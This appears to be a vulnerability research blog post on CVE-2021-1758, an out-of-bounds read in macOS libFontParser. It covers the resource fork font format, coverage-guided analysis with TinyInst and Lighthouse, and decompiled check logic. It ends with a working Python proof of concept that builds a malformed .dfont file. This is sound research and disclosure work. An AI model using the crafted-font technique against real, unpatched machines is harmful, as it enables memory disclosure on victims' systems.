
Analysis of CVE-2021-1758 (CoreText Out-Of-Bounds Read)

In February, Peter found an OOB read vulnerability in libFontParser.dylib. The latest tested version with the vulnerability is macOS Catalina 10.15.4 (19E287).

I wrote a guide earlier on setting up a testing environment.

Mac Resource Fork Font File

It turns out that macOS can load something called a Mac Resource Fork font file. Looks like a legacy thing.

In short, in the past, Macintosh files were divided into a data fork and a resource fork. The data fork contains data created by the user, while the resource fork consists of resources. It seems like on modern macOS systems, a file that has the structure of a resource fork can be used to store fonts, and there is no need for a data fork.

Resource Fork Structure

Here are some notes on the structure of a resource fork, which is better illustrated here (page 151 of the doc).

A resource fork can store multiple resources, with the whole file laid out in the following structure:

  • Resource Header - Offsets and size of the following 2 components
  • Resource Data - Yea the data for the resources
  • Resource Map - Information about where each resource is located in the file, and some extra information

Resource Header

The resource header consists of 16 bytes.

  • Offset to resource data (4 bytes)
  • Offset to resource map (4 bytes)
  • Length of resource data (4 bytes)
  • Length of resource map (4 bytes)

It seems like there can be some extra data that comes after the resource header, but I have yet to find more information about that.
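To make the header layout concrete, here is a minimal sketch that decodes the four fields with Python's struct module. The function name parse_resource_header and the example values are made up for illustration, and the fields are read as big-endian, which is what the library turns out to expect later in this post.

```python
import struct

def parse_resource_header(blob: bytes) -> dict:
    """Decode the 16-byte resource header (four big-endian 32-bit fields)."""
    if len(blob) < 16:
        raise ValueError("resource header needs at least 16 bytes")
    data_off, map_off, data_len, map_len = struct.unpack(">IIII", blob[:16])
    return {
        "data_offset": data_off,
        "map_offset": map_off,
        "data_length": data_len,
        "map_length": map_len,
    }

# Hypothetical example: 132 bytes of data at offset 40, map right after it.
example = struct.pack(">IIII", 40, 172, 132, 65)
header = parse_resource_header(example)
```

The map offset in this example is simply the data offset plus the data length, which is how the generator scripts in this post compute it as well.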

Resource Data

Since there can be multiple resources in a resource file, there can be multiple resource data entries in the resource data section. Each resource data entry is simply laid out as follows:

  • Length of following resource data (4 bytes)
  • Resource data for this resource (variable size)

As can be seen here, the resource data just contains the data. More information is kept in the resource map.
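As a rough sketch of how these length-prefixed entries could be walked, assuming the entries are packed back to back (a real parser would locate each entry through the offsets in the resource map instead). The helper name iter_resource_data is hypothetical.

```python
import struct

def iter_resource_data(section: bytes):
    """Yield (entry_offset, payload) for each length-prefixed entry."""
    pos = 0
    while pos + 4 <= len(section):
        (length,) = struct.unpack_from(">I", section, pos)
        start, end = pos + 4, pos + 4 + length
        if end > len(section):
            raise ValueError(f"entry at offset {pos} runs past the section")
        yield pos, section[start:end]
        pos = end

# Two made-up entries: 3 bytes of data, then 2 bytes of data.
section = struct.pack(">I", 3) + b"abc" + struct.pack(">I", 2) + b"hi"
entries = list(iter_resource_data(section))
```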

Resource Map

The resource map has a lot of fields:

  • Copy of resource header (16 bytes)
  • Handle to next resource map (4 bytes)
    • no idea what’s this
  • File reference number (2 bytes)
    • no idea what’s this
  • Resource fork attributes (2 bytes)
  • Offset from beginning of map to resource type list (2 bytes)
  • Offset from beginning of map to resource name list (2 bytes)
  • Number of types in the map minus 1 (2 bytes)
  • Resource type list (variable size)
  • Reference lists (variable size)
  • Resource name list (variable size)

The resource type list, reference list, and resource name list all contain more information about the resources stored in this resource fork file.
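The fixed part of the resource map can be sketched as a single struct format. This is only an illustration: the names MAP_HEADER and parse_map_header are mine, and the file reference number is taken as 2 bytes, which is what puts the type list offset at byte 24 of the map.

```python
import struct

# header copy (16) + next-map handle (4) + file reference number (2)
# + fork attributes (2) + type list offset (2) + name list offset (2)
# + number of types minus 1 (2) = 30 bytes, all big-endian
MAP_HEADER = struct.Struct(">16sIHHHHH")

def parse_map_header(res_map: bytes) -> dict:
    (_copy, _handle, _file_ref, attrs,
     type_off, name_off, count_minus_1) = MAP_HEADER.unpack_from(res_map)
    return {
        "attributes": attrs,
        "type_list_offset": type_off,
        "name_list_offset": name_off,
        "num_types": (count_minus_1 + 1) & 0xFFFF,
    }

# Hypothetical map: type list at offset 30, name list at offset 50, one type.
example_map = MAP_HEADER.pack(bytes(16), 0, 0, 0, 30, 50, 0)
parsed = parse_map_header(example_map)
```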

Resource type list

As the name suggests, this contains the resource types in the file. There can be more than one resource that share the same type, and there can be more than one type of resource stored in this file.

Each item in the resource type list is as follows:

  • Resource type (4 bytes)
  • Num of resources of this type in map minus 1 (2 bytes)
  • Offset from beginning of resource type list to reference list of this type (2 bytes)

Each resource type has a corresponding reference list that contains entries for each resource of that type. The reference lists are contiguous, and have the same order as the types in the resource type list.
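A small sketch of reading the 8-byte type entries described above. The function name and the two example entries (including their reference list offsets) are invented for illustration.

```python
import struct

def parse_type_list(type_entries: bytes, num_types: int) -> list:
    """Decode num_types 8-byte entries: type, count minus 1, ref list offset."""
    entries = []
    for i in range(num_types):
        res_type, count_minus_1, ref_off = struct.unpack_from(
            ">4sHH", type_entries, i * 8)
        entries.append((res_type, count_minus_1 + 1, ref_off))
    return entries

# Hypothetical list: one 'FOND' resource, then two 'sfnt' resources.
raw = b"FOND" + struct.pack(">HH", 0, 16) + b"sfnt" + struct.pack(">HH", 1, 28)
types = parse_type_list(raw, 2)
```

Note how the stored count is always one less than the real count, so the parser adds 1 back.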

Reference list

As the name suggests, this list contains some offsets (references) to more information about a resource in the file.

  • Resource ID (2 bytes)
  • Offset from beginning of resource name list to resource name (2 bytes)
    • -1 if no name
  • Resource attributes (1 byte)
  • Offset from beginning of resource data to data for this resource (3 bytes)
  • Handle to resource (4 bytes)
    • No idea what’s this
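The only awkward part of a reference entry is the 1-byte attribute packed next to a 3-byte data offset. One way to handle it, sketched below with a hypothetical parse_reference helper, is to read both as one 32-bit value and split it with a shift and a mask. The name offset is read as unsigned here, so "-1" shows up as 0xFFFF.

```python
import struct

NO_NAME = 0xFFFF  # -1 stored in an unsigned 16-bit field

def parse_reference(entry: bytes) -> dict:
    """Decode one 12-byte reference list entry (big-endian)."""
    res_id, name_off, attrs_and_off, _handle = struct.unpack_from(">hHII", entry)
    return {
        "id": res_id,
        "name_offset": None if name_off == NO_NAME else name_off,
        "attributes": attrs_and_off >> 24,        # top byte
        "data_offset": attrs_and_off & 0xFFFFFF,  # low 3 bytes
    }

# Made-up entry: id 1337, no name, no attributes, data at offset 258.
raw = struct.pack(">hHB3sI", 1337, NO_NAME, 0, (258).to_bytes(3, "big"), 0)
ref = parse_reference(raw)
```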

Resource name list

A lot simpler than the lists before:

  • Length of following resource name (1 byte)
  • Chars of resource name (variable size)
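Each name is a length-prefixed (Pascal-style) string. Below is a minimal sketch of a reader that validates the offset and length before slicing. The helper read_resource_name is hypothetical and is not how the library does it.

```python
def read_resource_name(name_list: bytes, offset: int) -> bytes:
    """Return the name stored at the given offset in the name list."""
    if not 0 <= offset < len(name_list):
        raise ValueError("name offset is outside the name list")
    length = name_list[offset]          # 1-byte length prefix
    end = offset + 1 + length
    if end > len(name_list):
        raise ValueError("name runs past the end of the name list")
    return name_list[offset + 1:end]

# Two made-up names stored back to back.
names = bytes([4]) + b"GGWP" + bytes([3]) + b"abc"
first = read_resource_name(names, 0)
second = read_resource_name(names, 5)
```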

Understanding the Target

Now, it is time to better understand the target library (libFontParser.dylib). I do so by providing some font files as input to the library, and using Lighthouse to see which parts of the library were executed while loading each font file.

Harness

Firstly, with a clear understanding of the expected file structure, I try to write a harness that loads a font file, to try to reproduce the bug.

// g++ main.m -o main -framework CoreText -framework Foundation

#import <Foundation/Foundation.h>
#import <CoreText/CoreText.h>

void harness(const char* font_file)
{
    NSString *path = [NSString stringWithUTF8String:font_file];
    NSURL *url = [NSURL fileURLWithPath:path];
    NSLog(@"%@", url);

    CFArrayRef descriptors = CTFontManagerCreateFontDescriptorsFromURL((__bridge CFURLRef)url);

    if (descriptors == NULL)
        NSLog(@"Error when loading font file");
    else
        NSLog(@"Successfully loaded font file");
}

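int main(int argc, const char* argv[]) {
    // Require a font path so argv[1] is never read when it is missing.
    if (argc < 2) {
        NSLog(@"usage: %s <font file>", argv[0]);
        return 1;
    }
    harness(argv[1]);
    return 0;
}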

It works well 😃

$ g++ main.m -o main -framework CoreText -framework Foundation

$ ./main /Library/Fonts/Arial\ Unicode.ttf
2021-09-13 21:37:57.143 main[8872:43357] file:///Library/Fonts/Arial%20Unicode.ttf
2021-09-13 21:37:57.147 main[8872:43357] Successfully loaded font file

$ ./main main.m
2021-09-13 21:38:06.988 main[8877:43397] main.m -- file:///Users/daniellimws/coretext/
2021-09-13 21:38:07.002 main[8877:43397] Error when loading font file

Font file

from pwn import p8, p16, p32, p64, context

# res data (132 bytes)
res_data = b""
res_data += p32(128)
res_data += b"A" * 128

res_data_offset = 16
res_data_len = len(res_data)

# res map header (14 bytes (+16 later))
res_map = b""
res_map += p32(0)   # handle to next resource map
res_map += p16(0)   # file reference number
res_map += p16(0)   # fork attributes
res_map += p16(30)  # offset to res type list
res_map += p16(50)  # offset to res name list
res_map += p16(0)   # num types in map - 1

# type list (8 bytes)
res_map += b"FOND"
res_map += p16(0)       # num of res of this type - 1
res_map += p16(8)       # offset from type list start to ref list of this type

# ref list (12 bytes)
res_map += p16(1337)        # res id
res_map += p16(0)           # offset from resource name list start to res name of this res
res_map += p8(0)            # attributes
res_map += b"\x00\x00\x00"  # offset from res data start to this res data
res_map += p32(0)           # handle to resource

# res name (5 bytes)
res_map += p8(4)
res_map += b"GGWP"

res_map_offset = res_data_offset + res_data_len
res_map_len = len(res_map) + 16     # add 16 for res header later

res_header = b""
res_header += p32(res_data_offset)
res_header += p32(res_map_offset)
res_header += p32(res_data_len)
res_header += p32(res_map_len)

res_map = res_header + res_map

with open("myfont.dfont", "wb") as out:
    out.write(res_header)
    out.write(res_data)
    out.write(res_map)

Coverage

I use TinyInst to measure the library’s coverage when loading a certain font file.

To build TinyInst

git clone --recurse-submodules https://github.com/googleprojectzero/TinyInst
cd TinyInst
mkdir build
cd build
cmake ..
cmake --build .

The project README suggests using cmake -G Xcode .., but it is likely that this doesn’t work if the macOS version is not the latest one. Just drop the -G Xcode and it works fine too.

Use TinyInst to get coverage

After building TinyInst, there will be a litecov binary in the build folder. This can be used to measure the basic block coverage in a library. In the command below, there are a few options passed to litecov:

  • -instrument_module - which module to instrument and measure coverage for
  • -target-env - extra env variables for the program
    • DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib is a way to check for any memory violations during program execution, similar to PageHeap on Windows
  • -patch_return_addresses - may be needed because the program might otherwise not run properly after instrumentation
  • -coverage_file - measure basic block coverage and write the executed basic block offsets into a file

$ sudo ~/TinyInst/build/litecov -instrument_module libFontParser.dylib -target-env DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib -patch_return_addresses -coverage_file cov.txt -- ./main /Library/Fonts/Arial\ Unicode.ttf

Instrumented module libFontParser.dylib, code size: 1277952
Process finished normally
Found 719 new offsets in libFontParser.dylib

719 basic blocks were executed while loading the Arial font.

Above, sudo is needed because of some macOS protections. Read more about it here.

Also, recently there was this tweet about a new feature in TinyInst. The -generate_unwind option seems to perform better than -patch_return_addresses, so I decided to give it a try.

# using -generate_unwind
$ time sudo ~/TinyInst/build/litecov -instrument_module libFontParser.dylib -target-env DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib -generate_unwind -coverage_file cov.txt -- ./main /Library/Fonts/Arial\ Unicode.ttf
Instrumented module libFontParser.dylib, code size: 1277952
Process finished normally
Found 719 new offsets in libFontParser.dylib
sudo ~/TinyInst/build/litecov -instrument_module libFontParser.dylib      --   0.14s user 0.15s system 70% cpu 0.414 total

# using -patch_return_addresses
$ time sudo ~/TinyInst/build/litecov -instrument_module libFontParser.dylib -target-env DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib -patch_return_addresses -coverage_file cov.txt -- ./main /Library/Fonts/Arial\ Unicode.ttf
Instrumented module libFontParser.dylib, code size: 1277952
Process finished normally
Found 719 new offsets in libFontParser.dylib
sudo ~/TinyInst/build/litecov -instrument_module libFontParser.dylib      --   0.05s user 0.17s system 63% cpu 0.344 total

Hmm, maybe the scope is too small to see any meaningful results. Nevermind.

Arial vs My Font

Anyways, to compare between the coverage of loading Arial vs the font I just made:

# loading Arial
$ sudo ~/TinyInst/build/litecov -instrument_module libFontParser.dylib -target-env DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib -generate_unwind -coverage_file cov.txt -- ./main /Library/Fonts/Arial\ Unicode.ttf
Instrumented module libFontParser.dylib, code size: 1277952
Process finished normally
Found 719 new offsets in libFontParser.dylib

# loading my font
$ sudo ~/TinyInst/build/litecov -instrument_module libFontParser.dylib -target-env DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib -generate_unwind -coverage_file cov.txt -- ./main myfont
Instrumented module libFontParser.dylib, code size: 1277952
Process finished normally
Found 557 new offsets in libFontParser.dylib

719 vs 557. Not too sure what to make of this.
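One way to get more out of the two runs than a pair of counts is to diff the sets of covered offsets. The sketch below is hedged: it assumes each line of the coverage file identifies one basic block (something like module+offset), and it works on text that would come from two separately saved coverage files, since the commands above overwrite cov.txt on every run. The function names and sample lines are made up.

```python
def load_offsets(text: str) -> set:
    """Collect the non-empty lines of a coverage file as a set."""
    return {line.strip() for line in text.splitlines() if line.strip()}

def compare_coverage(a_text: str, b_text: str) -> dict:
    a, b = load_offsets(a_text), load_offsets(b_text)
    return {"only_a": a - b, "only_b": b - a, "shared": a & b}

# Made-up sample contents standing in for two saved coverage files.
arial_cov = "libFontParser.dylib+0x1000\nlibFontParser.dylib+0x2000\n"
myfont_cov = "libFontParser.dylib+0x1000\nlibFontParser.dylib+0x3000\n"
diff = compare_coverage(arial_cov, myfont_cov)
```

The blocks in only_b are the interesting ones here, since they are reached only by the custom font.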

Use Lighthouse to visualize coverage

Numbers may be good for comparison, but they don’t really tell how far the library went in terms of loading the font. It is better to load cov.txt in Lighthouse and visualize the executed code in IDA (Ghidra should work too).

According to the advisory, the backtrace of the crash is as follows:

    #0 0x7fff54430de5 in GetResourcePtrCommon (libFontParser.dylib:x86_64+0x70de5)
    #1 0x7fff54430e7b in FPRMGetIndexedResource (libFontParser.dylib:x86_64+0x70e7b)
    #2 0x7fff543c469e in TResourceForkFileReference::GetIndexedResource(unsigned int, unsigned int, short*, unsigned long*, unsigned char*) const (libFontParser.dylib:x86_64+0x469e)
    #3 0x7fff543c4626 in TResourceFileDataReference::TResourceFileDataReference(TResourceForkSurrogate const&, unsigned int, unsigned int) (libFontParser.dylib:x86_64+0x4626)
    #4 0x7fff543c454f in TResourceFileDataSurrogate::TResourceFileDataSurrogate(TResourceForkSurrogate const&, unsigned int, unsigned int) (libFontParser.dylib:x86_64+0x454f)
    #5 0x7fff54413914 in TFont::CreateFontEntities(char const*, bool, bool&, short, char const*, bool) (libFontParser.dylib:x86_64+0x53914)
    #6 0x7fff54416482 in TFont::CreateFontEntitiesForFile(char const*, bool, bool, short, char const*) (libFontParser.dylib:x86_64+0x56482)
    #7 0x7fff543c103d in FPFontCreateFontsWithPath (libFontParser.dylib:x86_64+0x103d)
    #8 0x7fff381a75ee in create_private_data_array_with_path (CoreGraphics:x86_64h+0xa5ee)
    #9 0x7fff381a730b in CGFontCreateFontsWithPath (CoreGraphics:x86_64h+0xa30b)
    #10 0x7fff381a6f56 in CGFontCreateFontsWithURL (CoreGraphics:x86_64h+0x9f56)
    #11 0x7fff39b842ad in CreateFontsWithURL(__CFURL const*, bool) (CoreText:x86_64+0xe2ad)
    #12 0x7fff39c82024 in CTFontManagerCreateFontDescriptorsFromURL (CoreText:x86_64+0x10c024)
    #13 0x10b7f1d7c in load_font_from_path(char*) (harness:x86_64+0x100001d7c)
    #14 0x10b7f2dd1 in main (harness:x86_64+0x100002dd1)
    #15 0x7fff71ce6cc8 in start (libdyld.dylib:x86_64+0x1acc8)

I want to see which functions in libFontParser.dylib were executed when loading my custom font. According to Lighthouse, these functions were executed (i.e. the pseudocode of the function has a green background after Lighthouse loads cov.txt):

  • FPFontCreateFontsWithPath
  • TFont::CreateFontEntitiesForFile
  • TFont::CreateFontEntities

It stops here, and doesn’t execute the next function in the backtrace (TResourceFileDataSurrogate::TResourceFileDataSurrogate).

It seems to fail this check:

if ( v24
    || (((unsigned int)v171 ^ 'ofd.' | *(_DWORD *)((char *)&v171 + 3) ^ 'tno') == 0 || fdType == 'dfon')
    && (v25 = 1, v140 >= 0x101) )

Not too sure what values the variables hold at this point, but I would guess this is the file extension. It seems to be checking if the file extension is .dfont. After changing the file name to end with .dfont, running TinyInst and loading cov.txt into Lighthouse again, the execution indeed got a bit further.
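The guess can be checked by decoding the constants. The sketch below assumes the decompiler prints multi-character constants most significant byte first and that the two DWORD loads are little-endian (x86), so 'ofd.' read from memory is the bytes ".dfo" and 'tno' at offset 3 is "ont" followed by a NUL. The helper names are mine.

```python
import struct

def multichar(text: str) -> int:
    """Integer value of a multi-character constant such as 'ofd.'."""
    return int.from_bytes(text.encode("ascii"), "big")

def matches_dfont(buf: bytes) -> bool:
    """Re-create the two XOR comparisons from the decompiled check."""
    first = struct.unpack_from("<I", buf, 0)[0]   # bytes 0..3
    second = struct.unpack_from("<I", buf, 3)[0]  # bytes 3..6
    return ((first ^ multichar("ofd.")) | (second ^ multichar("tno"))) == 0

is_dfont = matches_dfont(b".dfont\x00")
is_ttf = matches_dfont(b".ttf\x00\x00\x00")
```

Under these assumptions the check only passes for the NUL-terminated string ".dfont", which matches the file extension theory.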

Now, it fails at this check:

    ResourceCount = TResourceForkFileReference::GetResourceCount(v146, 'FOND');
    if ( !ResourceCount )
    {
        ...
        goto some_cleanup_and_return;
    }

Clearly this was because my resource fork file doesn’t have a resource of type 'FOND'. Oh… Seems to not be so straightforward. After changing the resource type in the file to 'FOND', coverage still doesn’t increase.

Looking deeper, the library calls TResourceForkSurrogate::TResourceForkSurrogate then TResourceForkFileReference::TResourceForkFileReference, and seems to throw an exception through __cxa_throw.

In lldb, br set -E c++ to break on all exceptions. Indeed, after continuing past some breakpoints, it throws an exception with the following backtrace:

Process 12922 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 10.1
    frame #0: 0x00007fff69c4e0f8 libc++abi.dylib`__cxa_throw
Target 0: (main) stopped.
(lldbinit) bt
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 10.1
  * frame #0: 0x00007fff69c4e0f8 libc++abi.dylib`__cxa_throw
    frame #1: 0x00007fff4effb29e libFontParser.dylib`TResourceForkFileReference::TResourceForkFileReference(char const*, bool) + 152
    frame #2: 0x00007fff4effb18b libFontParser.dylib`TResourceForkSurrogate::TResourceForkSurrogate(char const*, bool) + 117
    frame #3: 0x00007fff4f04a8a7 libFontParser.dylib`TFont::CreateFontEntities(char const*, bool, bool&, short, char const*, bool) + 613
    frame #4: 0x00007fff4f04b19e libFontParser.dylib`TFont::CreateFontEntities(char const*, bool, bool&, short, char const*, bool) + 2908
    frame #5: 0x00007fff4f04d483 libFontParser.dylib`TFont::CreateFontEntitiesForFile(char const*, bool, bool, short, char const*) + 263
    frame #6: 0x00007fff4eff803e libFontParser.dylib`FPFontCreateFontsWithPath + 202
    frame #7: 0x00007fff32f775ef CoreGraphics`create_private_data_array_with_path + 12
    frame #8: 0x00007fff32f7730c CoreGraphics`CGFontCreateFontsWithPath + 26
    frame #9: 0x00007fff32f76f57 CoreGraphics`CGFontCreateFontsWithURL + 359
    frame #10: 0x00007fff349542ae CoreText`CreateFontsWithURL(__CFURL const*, bool) + 222
    frame #11: 0x00007fff34a52025 CoreText`CTFontManagerCreateFontDescriptorsFromURL + 50
    frame #12: 0x0000000100003eab main`harness + 107
    frame #13: 0x0000000100003f13 main`main + 35
    frame #14: 0x00007fff6c91dcc9 libdyld.dylib`start + 1
    frame #15: 0x00007fff6c91dcc9 libdyld.dylib`start + 1

Looking into the functions that were called before the exception, it was thrown because FPRMNewMappedRefFromMappedFork returns a non-zero value.

  if (FPRMNewMappedRefFromMappedFork(...))
  {
    ...
    __cxa_throw(exception, (struct type_info *)&`typeinfo for'TException, TException::~TException);
  }

And inside FPRMNewMappedRefFromMappedFork:

res = CheckMapHeaderCommon(a1, a2);
if ( res )
{
    return res;
}

So, CheckMapHeaderCommon is the culprit. There must have been something wrong with the map header (which most likely refers to the resource map header described earlier). It must return 0 so that no exceptions are thrown.

Incidentally, if CheckMapHeaderCommon returns 0, the library will then call CheckMapCommon, which was mentioned in the advisory.

res = CheckMapHeaderCommon(a1, a2);
if ( res )
{
    return res;
}
else
{
    ...
    CheckMapCommon(...);
}

The CheckMapHeaderCommon function returns with an error right at the start.

res_map_offset = _byteswap_ulong(header[1]);
res = -199;
if ( res_map_offset <= file_len - 30 && res_map_offset - 40 <= 0xFFFFD7 )

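Not paying too much attention to the comparisons yet, but the main issue here is the byteswap (the underlying x86 instruction is bswap). The library swaps the bytes of each field after reading it, which means the values in the file are expected to be big-endian, while my script wrote them as little-endian… So I need to modify my font generator script.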

Not too much work with pwntools, just an extra line at the start of the script:

context.endian = 'big'

Immediately, there is more coverage. Good stuff.

$ sudo ~/TinyInst/build/litecov -instrument_module libFontParser.dylib -target-env DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib -generate_unwind -coverage_file cov.txt -- ./main myfont.dfont

Instrumented module libFontParser.dylib, code size: 1277952
Process finished normally
Found 566 new offsets in libFontParser.dylib
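To see why the little-endian file could not pass the first check, here is a small sketch using struct instead of pwntools. The value 148 is the resource map offset from the first version of the script (16-byte header plus 132 bytes of resource data). Reading a field as big-endian is used here as a stand-in for the byteswap on a little-endian host.

```python
import struct

map_offset = 148  # 16-byte header + 132 bytes of resource data

little = struct.pack("<I", map_offset)  # what the first script wrote
big = struct.pack(">I", map_offset)     # what the parser expects

# Interpreting the stored bytes as big-endian mimics the byteswapped read.
seen_from_little = struct.unpack(">I", little)[0]
seen_from_big = struct.unpack(">I", big)[0]
```

With the little-endian file the library sees a map offset of 0x94000000, far beyond the end of a file that is only a couple of hundred bytes long.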

Now there’s another problem: it looks like the resource data must start at an offset of at least 40 (0x28).

res_data_offset = _byteswap_ulong(*header);
if ( res_data_offset >= 0x28 && res_data_offset <= file_len )
{
    ...
}

So, I have to add some padding between the resource header and the resource data. After this change, more good news: Found 585 new offsets.
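The two fragments of CheckMapHeaderCommon shown so far can be modelled in a few lines. This is only a sketch of those fragments, not the whole function, and it assumes the comparisons are unsigned 32-bit (which is how the "x - 40 <= 0xFFFFD7" pattern usually works). The file lengths come from the layout of my script before and after adding 24 bytes of padding.

```python
U32 = 0xFFFFFFFF

def header_checks_pass(data_offset: int, map_offset: int, file_len: int) -> bool:
    """Model of the two header checks seen in the decompiled code."""
    map_ok = (map_offset <= ((file_len - 30) & U32)
              and ((map_offset - 40) & U32) <= 0xFFFFD7)
    data_ok = 0x28 <= data_offset <= file_len
    return map_ok and data_ok

# Before padding: header (16) + data (132) + map (55) = 203 bytes.
before = header_checks_pass(data_offset=16, map_offset=148, file_len=203)
# After padding: header (16) + padding (24) + data (132) + map (55) = 227 bytes.
after = header_checks_pass(data_offset=40, map_offset=172, file_len=227)
```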

Loading the latest cov.txt in Lighthouse, this time, I see CheckMapCommon called. However, an exception is thrown after it. This means there is more fixing to be done.

An error is returned at the following check:

if ( num_types < 0 || res_map_end_offset < typelist + 8LL * num_types )
    return (unsigned int)-199;

Long story short, the documentation seems to be slightly wrong/misleading. At offset 24 of the resource map, instead of storing the offset of the resource type list, it stores the offset to the number of resource types, just 2 bytes before the resource type list. Alternatively, the number of resource types can be treated to be stored at the start of the resource type list.

If the above is confusing, basically, the value stored at offset 24 of the resource map should be reduced by 2 to pass the check. After this fix, 593 new offsets.

Still exception after this fix… According to the advisory, there is a value here to tamper with, to make CheckMapCommon return early without an error, skipping all the checks that come after. This also allows for the vulnerability to be triggered later.

num_types_ptr = (_WORD *)(res_map + res_type_list_offset);
num_types = __ROL2__(*num_types_ptr, 8) + 1;    // ROL2 by 8 swaps the two bytes (big-endian to host order), then increment
if ( num_types <= 0 )
    return 0;

It appears that if num_types <= 0, the function will return early with 0 (success). This is easy to set. However, there is another check a bit earlier.

if ( num_types < 0 || res_map_end_offset < typelist + 8LL * num_types )
    return (unsigned int)-199;

So, the only ok value for num_types is 0. This is doable by setting it to 0xFFFF in the file, as it will be incremented later.
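A quick brute force confirms that 0xFFFF is the only stored value that takes the early return. The sketch assumes num_types is a signed 16-bit value, so the increment wraps around, and it leaves out the map size comparison, which is not the limiting factor when num_types is 0. The function names are hypothetical.

```python
def to_int16(value: int) -> int:
    """Interpret the low 16 bits of value as a signed 16-bit integer."""
    value &= 0xFFFF
    return value - 0x10000 if value & 0x8000 else value

def check_map_outcome(stored: int) -> str:
    """stored is the big-endian 'number of types minus 1' field value."""
    num_types = to_int16(stored + 1)
    if num_types < 0:
        return "error"          # the -199 path
    if num_types <= 0:
        return "early return"   # returns 0 before the remaining checks
    return "full checks"

early = [s for s in range(0x10000) if check_map_outcome(s) == "early return"]
```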

After changing num_types, the coverage becomes 629 new offsets. Loading cov.txt into Lighthouse, I see the program reaches GetResourcePtrCommon, the vulnerable function.

Vulnerability

The program now has managed to reach the vulnerable function at GetResourcePtrCommon. But there is some weirdness, it checks if num_types <= 0. Because earlier it was set to 0, it just returns here right at the start of the function.

_WORD *res_map;
num_types = __ROL2__(res_map[14], 8) + 1;   // res_map[14] reads a WORD from byte offset 28 (14 * 2) of the resource map, i.e. num_types
...
if ( num_types <= 0 )
    return 0LL;

However, CheckMapCommon seems to retrieve the value differently from GetResourcePtrCommon. The former reads the value based on the offset to the resource type list, whereas the latter reads it from a fixed location (res_map[14], i.e. byte offset 28, which assumes the type list entries start at offset 30).

Now, I’m quite confused, not sure if they both are supposed to be the same value… Looking at the documentation repeatedly, I don’t see any other explanation to this. Implementation mistake?

In any case, since the two values are read differently, I can set them to different values, so that num_types == 0 in CheckMapCommon, but num_types > 0 in GetResourcePtrCommon. (This was not reported in the advisory, so I wonder if there may be more bugs due to this?)
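The disagreement between the two readers can be reproduced on a tiny hand-built map. This is a sketch under the same assumptions as before (signed 16-bit count, big-endian fields). The field values mirror the proof of concept at the end of this post, and the helper names are mine.

```python
import struct

def to_int16(value: int) -> int:
    value &= 0xFFFF
    return value - 0x10000 if value & 0x8000 else value

def count_at(buf: bytes, offset: int) -> int:
    """Read 'number of types minus 1' at offset and add 1, as both functions do."""
    return to_int16(struct.unpack_from(">H", buf, offset)[0] + 1)

header_copy = bytes(16)                               # placeholder header copy
fields = struct.pack(">IHHHHH", 0, 0, 0, 38, 60, 0)   # offset 24 -> 38, offset 28 -> 0
real_types = b"FOND" + struct.pack(">HH", 0, 20)      # entries at offset 30
fake_count = struct.pack(">H", 0xFFFF)                # fake count at offset 38
res_map = header_copy + fields + real_types + fake_count

type_list_offset = struct.unpack_from(">H", res_map, 24)[0]
count_seen_by_check = count_at(res_map, type_list_offset)  # follows the offset field
count_seen_by_lookup = count_at(res_map, 28)               # fixed location
```

The reader that follows the offset field sees 0 types, while the reader that uses the fixed location sees 1, which is exactly the split needed here.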

To achieve the above, I made a fake type list that is located at an offset different from the assumed 30. I tweaked the offsets a bit, and got the program to reach the memmove call as described in the advisory.

    res_name_entry = &res_name_list[(unsigned __int16)__ROL2__(index, 8)];
    memmove(__dst, res_name_entry, (unsigned __int8)*res_name_entry + 1LL);

Earlier in CheckMapCommon, a bunch of checks were skipped because it returned early after seeing num_types <= 0, so the offset of the resource name entry was never checked. It is therefore possible to read out of bounds, up to 65535 bytes past the start of the resource name list, as the offset is a 16-bit WORD.
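To put numbers on the out-of-bounds read, the sketch below computes the byte range (relative to the start of the resource map) that the memmove would touch. The values 60, 0x6000 and 65 are the name list offset, the name offset and the total map length of the proof of concept in the next section. The length byte is whatever happens to be in memory at that location, so 0 is just a placeholder.

```python
def name_read_span(name_list_offset: int, name_offset: int, length_byte: int):
    """Return (start, end) of the copied bytes, relative to the map start."""
    start = name_list_offset + (name_offset & 0xFFFF)
    return start, start + 1 + length_byte   # memmove copies length + 1 bytes

MAP_LEN = 65  # 16 + 14 + 8 + 10 + 12 + 5 bytes in the proof of concept

start, end = name_read_span(60, 0x6000, 0)
out_of_bounds = end > MAP_LEN
farthest_end = name_read_span(60, 0xFFFF, 0xFF)[1]
```

Even the smallest possible copy starts more than 24 KB past the end of the 65-byte map.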

POC

from pwn import p8, p16, p32, p64, context

RELATIVE_READ = 0x6000

context.endian = 'big'

# res data (132 bytes)
res_data = b""
res_data += p32(128)
res_data += b"A" * 128

res_data_offset = 16 + 24
res_data_len = len(res_data)

# res map header (14 bytes (+16 later))
res_map = b""
res_map += p32(0)   # handle to next resource map
res_map += p16(0)   # file reference number
res_map += p16(0)   # fork attributes
res_map += p16(38)  # offset to res type list
res_map += p16(60)  # offset to res name list
res_map += p16(0)   # num types in map - 1

# type list (8 bytes)
res_map += b"FOND"
res_map += p16(0)       # num of res of this type - 1
res_map += p16(20)       # offset from type list start to ref list of this type

# fake type list (10 bytes)
res_map += p16(0xffff)  # num types in map - 1 (dup value???)
res_map += b"FOND"
res_map += p16(0)       # num of res of this type - 1
res_map += p16(20)       # offset from type list start to ref list of this type

# ref list (12 bytes)
res_map += p16(1337)        # res id
res_map += p16(RELATIVE_READ)           # offset from resource name list start to res name of this res
res_map += p8(0)            # attributes
res_map += b"\x00\x00\x00"  # offset from res data start to this res data
res_map += p32(0)           # handle to resource

# res name (5 bytes)
res_map += p8(4)
res_map += b"GGWP"

res_map_offset = res_data_offset + res_data_len
res_map_len = len(res_map) + 16     # add 16 for res header later

res_header = b""
res_header += p32(res_data_offset)
res_header += p32(res_map_offset)
res_header += p32(res_data_len)
res_header += p32(res_map_len)

res_map = res_header + res_map

with open("myfont.dfont", "wb") as out:
    out.write(res_header)
    out.write(b"A" * 24)    # padding needed by the program
    out.write(res_data)
    out.write(res_map)

